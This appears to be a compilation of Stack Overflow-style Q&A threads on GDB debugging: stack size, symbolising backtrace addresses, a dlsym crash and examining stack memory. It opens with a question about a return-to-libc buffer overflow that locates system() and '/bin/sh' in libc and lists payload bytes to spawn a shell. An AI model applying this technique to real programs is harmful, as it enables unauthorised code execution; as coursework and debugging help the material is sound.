I am trying to perform a buffer overflow for a project. The overflow needs to end up launching /bin/sh. I have found the correct return address, but the overflow does not seem to succeed.
Program received signal SIGSEGV, Segmentation fault.
0xb7fbc544 in msg (params) at myfile.c:167
167 msg_length = ctx->backend->send_msg_pre(msg, msg_length);
(gdb) backtrace
#0 0xb7fbc544 in msg (params) at myfile.c:167
#1 0xb7fbc869 in my_function(params) at myfile.c:912
#2 0xb7e4c190 in ?? () at ../sysdeps/unix/sysv/linux/system.c:76 from /lib/i386-linux-gnu/libc.so.6
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
To find the address of the /bin/sh string I followed this post:
(gdb) print &system
$15 = (<text variable, no debug info> *) 0xb7e4c190 <__libc_system>
(gdb) find &system,+9999999,"/bin/sh"
0xb7f6ca24
warning: Unable to access 16000 bytes of target memory at 0xb7fc292c, halting search.
1 pattern found.
(gdb)
I have found the return address and verified it is correct (if I replace it with a different function it calls that function). The original return address is bolded
0xbffff690: 0x90909090 0x90909090 0x90909090 0xb7e4c190
0xbffff6a0: 0xb7f6ca24 0x0804c050 0x0000004d 0x0804c158
The payload I sent was 0xb7e4c190 0xb7f6ca24 50
This overflow is a bit trickier than others because I need to pad the payload at the front and the back. The item I am overflowing is written 6 bytes at a time, so each write covers part of one address and part of the next.
I think the problem is that I have to overflow the last byte. I matched what it was originally, but that does not seem to work:
payload = payload + ['\x90'] + ['\xc1'] + ['\xe4'] + ['\xb7']
payload = payload + ['\x24'] + ['\xca'] + ['\xf6'] + ['\xb7'] + ['\x50']
Is there something I am missing here? Because the stack does not show the /bin/sh call in the overflow, I feel like that is not correct.
Is it possible to get the current size of the stack in bytes with GDB (at a breakpoint)?
I didn't find anything regarding this on the Internet.
It's unclear whether you are asking "how much stack has my thread consumed so far", or "what is the maximum stack size this thread may consume in the future".
The first question can be trivially answered by using:
# go to the innermost frame
(gdb) down 100000
(gdb) set var $stack = $sp
# go to the outermost frame
(gdb) up 100000
(gdb) print $sp - $stack
To answer the second question, you would need libpthread that is built with debug symbols. If using GLIBC, you can do this:
# Go to frame which is `start_thread`
(gdb) frame 2
#2 0x00007ffff7d7eeae in start_thread (arg=0x7ffff7a4c640) at pthread_create.c:463
463 in pthread_create.c
(gdb) p pd.stackblock
$1 = (void *) 0x7ffff724c000 # low end of stack block
(gdb) p pd.stackblock_size
$1 = 8392704
Here you can see that the entire stack spans [0x7ffff724c000, 0x7ffff7a4d000] region. You can also confirm that $sp is in that region, near the high address end of the stack (which grows from high to low addresses on this system):
(gdb) p $sp
$9 = (void *) 0x7ffff7a4be60
I want to programmatically convert backtrace stack addresses (eg obtained from backtrace_symbols/libunwind) to file:line:column. I'm on OSX but doubt this makes a difference.
All of these give wrong line number (line 11) for the call to fun1():
atos
addr2line
llvm-symbolizer
lldb image lookup --address using lldb's pc addresses in bt
lldb bt itself gives correct file:line:column, (line 7) as shown below.
How do I programmatically get the correct stack address such that, when using atos/addr2line/llvm-symbolizer/image lookup --address, it would resolve to the correct line number? lldb bt is doing it correctly, so there must be a way to do it. Note that if I use backtrace_symbols or libunwind (subtracted from info.dli_saddr after calling dladdr), I'd end up with the same address 0x0000000100000f74 as shown in lldb bt that points to the wrong line number 11
Note: in .lldbinit, if I add settings set frame-format frame start-addr:${line.start-addr}\n it will show the correct address (i.e. 0x0000000100000f6f instead of 0x0000000100000f74, which resolves to the correct line 7). However, how do I programmatically generate start-addr from a C program without spawning a call to lldb -p $pid? (Calling lldb has other issues, e.g. overhead compared to llvm-symbolizer, and it can in fact hang forever even with -batch.)
clang -g -o /tmp/z04 test_D20191123T162239.c
test_D20191123T162239.c:
void fun1(){
}
void fun1_aux(){
int a = 0;
fun1(); // line 7
mylabel:
if(1){
a++; // line 11
}
}
int main(int argc, char *argv[]) {
fun1_aux();
return 0;
}
lldb /tmp/z04
(lldb) target create "/tmp/z04"
Current executable set to '/tmp/z04' (x86_64).
(lldb) b fun1
Breakpoint 1: where = z04`fun1 + 4 at test_D20191123T162239.c:2:1, address = 0x0000000100000f54
(lldb) r
Process 7258 launched: '/tmp/z04' (x86_64)
Process 7258 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
frame #0: 0x0000000100000f54 z04 fun1 + 4 at test_D20191123T162239.c:2:1
1 void fun1(){
-> 2 }
3
4 void fun1_aux(){
5 int a = 0;
6
7 fun1();
Target 0: (z04) stopped.
(lldb) bt
* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
* frame #0: 0x0000000100000f54 z04 fun1 + 4 at test_D20191123T162239.c:2:1
frame #1: 0x0000000100000f74 z04 fun1_aux + 20 at test_D20191123T162239.c:7:3
frame #2: 0x0000000100000fab z04 main(argc=1, argv=0x00007ffeefbfb748) + 27 at test_D20191123T162239.c:16:3
frame #3: 0x00007fff71c182e5 libdyld.dylib start + 1
frame #4: 0x00007fff71c182e5 libdyld.dylib start + 1
(lldb)
(lldb) image lookup --address 0x0000000100000f74
Address: z04[0x0000000100000f74] (z04.__TEXT.__text + 36)
Summary: z04`fun1_aux + 20 at test_D20191123T162239.c:11:8
echo 0x0000000100000f74 | llvm-symbolizer -obj=/tmp/z04
fun1_aux
test_D20191123T162239.c:11:8
atos -o /tmp/z04 0x0000000100000f74
fun1_aux (in z04) (test_D20191123T162239.c:11)
likewise with addr2line
It's easier to understand if you look at the disassembly for fun1_aux -- you'll see a CALLQ instruction to fun1, followed by something like a mov %rax, -16(%rbp), the first instruction of your a++ line. Once you have called fun1, the return address is the instruction that will be executed when fun1 exits, the mov %rax, -16(%rbp) or whatever it is.
This isn't intuitively how most people think of the computer working -- they expect to look at frame 1, fun1_aux, and see the "current pc value" be the CALLQ, because the call is executing. But of course, that's not correct, the call instruction has completed, and the saved pc is going to point to the next instruction.
In cases like this, the next instruction is part of the next source line, so it's a little extra confusing. An even more confusing case is a function that calls a "noreturn" function like abort() -- the final instruction in the function will be a CALLQ, and if you look at the return address, it may point into the next function.
So when lldb is symbolicating stack frames above frame #0, it knows to do a symbol lookup with saved_pc - 1 to move the address back into the CALLQ instruction. That's not a valid address, so it should never show you saved_pc - 1, but it should do symbol / file & line lookups based on it.
You can get the same effect for your manual symbolication by doing the same thing. The one caveat is if you have an asynchronous interrupt (_sigtramp on macOS), the frame above _sigtramp should not have its saved pc value decremented. You could be executing the first instruction of a function when the signal is received, and decrementing it would put you in the previous function which would be very confusing.
We're loading a symbol from a shared library via dlsym() under GNU/Linux and obviously get some kind of race condition resulting in a segmentation fault. The backtrace looks something like this:
(gdb) backtrace
#0 do_lookup_x at dl-lookup.c:366
#1 _dl_lookup_symbol_x at dl-lookup.c:829
#2 do_sym at dl-sym.c:168
#3 _dl_sym at dl-sym.c:273
#4 dlsym_doit at dlsym.c:50
#5 _dl_catch_error at dl-error.c:187
#6 _dlerror_run at dlerror.c:163
#7 __dlsym at dlsym.c:70
#8 ... (our code)
My local machine uses glibc-2.23.
I discovered that the library handle given to __dlsym() in frame #7 is different from the handle passed to _dlerror_run(). It goes wrong in the following lines in dlsym.c:
void *
__dlsym (void *handle, const char *name DL_CALLER_DECL)
{
# ifdef SHARED
  if (__glibc_unlikely (_dlfcn_hook != NULL))
    return _dlfcn_hook->dlsym (handle, name, DL_CALLER);
# endif
  struct dlsym_args args;
  args.who = DL_CALLER;
  args.handle = handle; /* <------------------ this isn't my handle! */
  args.name = name;
  /* Protect against concurrent loads and unloads. */
  __rtld_lock_lock_recursive (GL(dl_load_lock));
  void *result = (_dlerror_run (dlsym_doit, &args) ? NULL : args.sym);
  __rtld_lock_unlock_recursive (GL(dl_load_lock));
  return result;
}
GDB says
(gdb) frame 7
#7 __dlsym at dlsym.c:70
(gdb) p *(struct link_map *)args.handle
$36 = {l_addr= 140736951484536, l_name = 0x7fffe0000078 "\300\215\r\340\377\177", ...}
so this is obviously garbage. The same occurs in the higher frames, e.g. in frame #2:
(gdb) frame 2
#2 do_sym at dl-sym.c:168
(gdb) p handle
$38 = {l_addr= 140736951484536, l_name = 0x7fffe0000078 "\300\215\r\340\377\177", ...}
Unfortunately the parameter handle in frame #7 can't be displayed:
(gdb) p handle
$37 = <optimized out>
but surprisingly in frame #8 and further down in our code the handle was correct:
(gdb) frame 8
#8 ...
(gdb) p *(struct link_map *)libHandle
$38 = {l_addr = 140737160646656, l_name = 0x7fffd8005b60 "/path/to/libfoo.so", ...}
My conclusion is that the variable args must be modified during execution inside __dlsym(), but I can't see where or why.
I have to confess, there's a second aspect to this problem: it only occurs in a multi-threaded environment, and only sometimes. But as you can see, there are some countermeasures against race conditions in the implementation of __dlsym(), since it calls __rtld_lock_(un)lock_recursive() and the local variable args isn't shared across threads. Curiously enough, the problem still persists if I make frame #8 mutually exclusive among my threads.
Question 1: What are possible sources for the discrepancy in the library handle between frame #8 and frame #7?
Question 2: Does dlopen() yield different values for different threads? Or to put it differently: is it possible to share the handles returned by dlopen() between different threads?
Update: I thank everybody who commented on this question and tried to answer it despite the lack of almost any viable information to do so. I found the solution to this problem. As foreseen by the commenters, it was totally unrelated to the stack traces and other information I provided. Hence, I consider this question closed and will flag it for deletion. So Long, and Thanks for All the Fish
What are possible sources for the discrepancy in the library handle between frame #8 and frame #7?
The most likely cause is a mismatch between ld-linux.so and libdl.so. As stated in this answer, ld-linux and libdl must come from the same build of GLIBC, or bad things will happen.
The mismatch can come from (A) trying to point to a different libc build via LD_LIBRARY_PATH, or (B) static linking of libdl.a into the program.
The (gdb) info shared command should show you which libraries are currently loaded. If you see something other than the installed system ld-linux and libdl, then (A) is likely your problem.
For (B), you probably got (and ignored) a linker warning to the effect that your program will require at runtime the same libc version that you used to link it. Contrary to popular belief, fully-static binaries are less portable on Linux, not more.
I'm new to reverse engineering. I wrote the following C code to help me understand a bit more about stack frames.
#include <stdio.h>
int sum(int a, int b,int c)
{
    return(a+b+c);
}
int media(int a, int b,int c)
{
    int total;
    total = a + b + c;
    return (total/3);
}
int main ()
{
    int num1,num2,num3;
    char keypress[1];
    num1 = 5;
    num2 = 10;
    num3 = 15;
    printf ("\nCalling sum function\n");
    sum(num1,num2,num3);
    printf ("\nWaiting a keypress to call media function\n");
    scanf ("%c",keypress);
    media(num1,num2,num3);
    printf ("\nWaiting a keypress to end\n");
    scanf ("%c",keypress);
    return(0);
}
As far as I know, every time you call a function a stack frame is created (see: ftp.gnu.org/old-gnu/Manuals/gdb/html_node/gdb_41.html). So, my goal with the above C code is to see, at least, three stack frames.
1) main function - stack frame
2) sum function - stack frame
3) media function - stack frame
BTW: Those printfs are just to help me 'follow' the program in gdb. =)
So I guess that if I compare the output of info frame right after the program starts with the output of info frame just after the sum function is called, I should get different output, right? I did not, as you can see:
Temporary breakpoint 1, main () at parastack.c:27
warning: Source file is more recent than executable.
27 num1 = 5;
(gdb) nexti
28 num2 = 10;
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf00:
rip = 0x400605 in main (parastack.c:28); saved rip = 0x7ffff7a3c790
source language c.
Arglist at 0x7fffffffdef0, args:
Locals at 0x7fffffffdef0, Previous frame's sp is 0x7fffffffdf00
Saved registers:
rbp at 0x7fffffffdef0, rip at 0x7fffffffdef8
(gdb) nexti
29 num3 = 15;
(gdb) nexti
31 printf ("\nCalling sum function\n");
(gdb) nexti
0x0000000000400618 31 printf ("\nCalling sum function\n");
(gdb) nexti
Calling sum function
32 sum(num1,num2,num3);
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf00:
rip = 0x40061d in main (parastack.c:32); saved rip = 0x7ffff7a3c790
source language c.
Arglist at 0x7fffffffdef0, args:
Locals at 0x7fffffffdef0, Previous frame's sp is 0x7fffffffdf00
Saved registers:
rbp at 0x7fffffffdef0, rip at 0x7fffffffdef8
(gdb) nexti
0x0000000000400620 32 sum(num1,num2,num3);
(gdb) info frame
Stack level 0, frame at 0x7fffffffdf00:
rip = 0x400620 in main (parastack.c:32); saved rip = 0x7ffff7a3c790
source language c.
Arglist at 0x7fffffffdef0, args:
Locals at 0x7fffffffdef0, Previous frame's sp is 0x7fffffffdf00
Saved registers:
rbp at 0x7fffffffdef0, rip at 0x7fffffffdef8
just after sum function is called
Your problem is that you never actually stopped inside of the sum function. You stopped after you printed that you are about to call it, and then you stepped a few instructions, but you never actually landed inside (it takes a few instructions to prepare arguments, one more to actually call, and a few more inside the function to set up the frame).
You should start by setting breakpoints inside sum and media, and doing info frame when these breakpoints are hit. You'll notice that the breakpoint is set a few instructions after the beginning of the function (i.e. after function prolog). The skipped instructions are exactly the ones that set up the new frame.
After you understand how that works, you should progress to using step and next commands.
And after that you can graduate to using disas, stepi and nexti commands.
Based on my interpretation of your prose, your understanding of stack frames is slightly off. You are correct that when a function is called a stack frame is created; what you're missing is that when a function returns, its stack frame is popped. The stack is in the same state it was in before the function began executing, except that the program counter now holds the address of the first instruction following the call to the function that just finished executing. So, you should not expect to see 3 stack frames after the two functions in main execute. You will only see one, since you're only one frame deep, in main().
As for the gdb session, as @Employed Russian points out, you never actually step into any function when printing the stack frame information.
Thanks to everyone who helped me. Below is the gdb session, which shows that the stack frame changed.
First I recompiled the C code: gcc -ggdb stack.c -o stack.bin
gdb stack.bin
(gdb) break sum
(gdb) start
(gdb) info frame
Stack level 0, frame at 0x7fffffffe1a0:
rip = 0x400653 in main (stack.c:26); saved rip 0x7ffff7a6fead
source language c.
Arglist at 0x7fffffffe190, args:
Locals at 0x7fffffffe190, Previous frame's sp is 0x7fffffffe1a0
Saved registers:
rbp at 0x7fffffffe190, rip at 0x7fffffffe198
(gdb) continue
Continuing.
Calling sum function
Breakpoint 1, sum (a=5, b=10, c=15) at stack.c:6
6 total = a + b + c;
(gdb) info frame
Stack level 0, frame at 0x7fffffffe180:
rip = 0x4005dd in sum (stack.c:6); saved rip 0x400684
called by frame at 0x7fffffffe1a0
source language c.
Arglist at 0x7fffffffe170, args: a=5, b=10, c=15
Locals at 0x7fffffffe170, Previous frame's sp is 0x7fffffffe180
Saved registers:
rbp at 0x7fffffffe170, rip at 0x7fffffffe178
Now I will search/learn more about the information in the output.
I am new to GDB, so I have some questions:
How can I look at content of the stack?
Example: to see content of register, I type info registers. For the stack, what should it be?
How can I see the content of $0x4(%esp)? When I type print /d $0x4(%esp), GDB gives an error.
Platform: Linux and GDB
info frame shows the stack frame info.
To read the memory at a given address, take a look at the x command.
x/x $esp prints hex, x/d $esp signed decimal, x/u $esp unsigned decimal, and so on. x takes a format suffix; you can also look at the current instruction via x/i $eip.
Use:
bt - backtrace: show stack functions and args
info frame - show stack start/end/args/locals pointers
x/100x $sp - show stack memory
(gdb) bt
#0 zzz () at zzz.c:96
#1 0xf7d39cba in yyy (arg=arg@entry=0x0) at yyy.c:542
#2 0xf7d3a4f6 in yyyinit () at yyy.c:590
#3 0x0804ac0c in gnninit () at gnn.c:374
#4 main (argc=1, argv=0xffffd5e4) at gnn.c:389
(gdb) info frame
Stack level 0, frame at 0xffeac770:
eip = 0x8049047 in main (goo.c:291); saved eip 0xf7f1fea1
source language c.
Arglist at 0xffeac768, args: argc=1, argv=0xffffd5e4
Locals at 0xffeac768, Previous frame's sp is 0xffeac770
Saved registers:
ebx at 0xffeac75c, ebp at 0xffeac768, esi at 0xffeac760, edi at 0xffeac764, eip at 0xffeac76c
(gdb) x/10x $sp
0xffeac63c: 0xf7d39cba 0xf7d3c0d8 0xf7d3c21b 0x00000001
0xffeac64c: 0xf78d133f 0xffeac6f4 0xf7a14450 0xffeac678
0xffeac65c: 0x00000000 0xf7d3790e
You need to use gdb's memory-display commands. The basic one is x, for examine. There's an example on the linked-to page that uses
gdb> x/4xw $sp
to print "four words (w) of memory above the stack pointer (here, $sp) in hexadecimal (x)". The quotation is slightly paraphrased.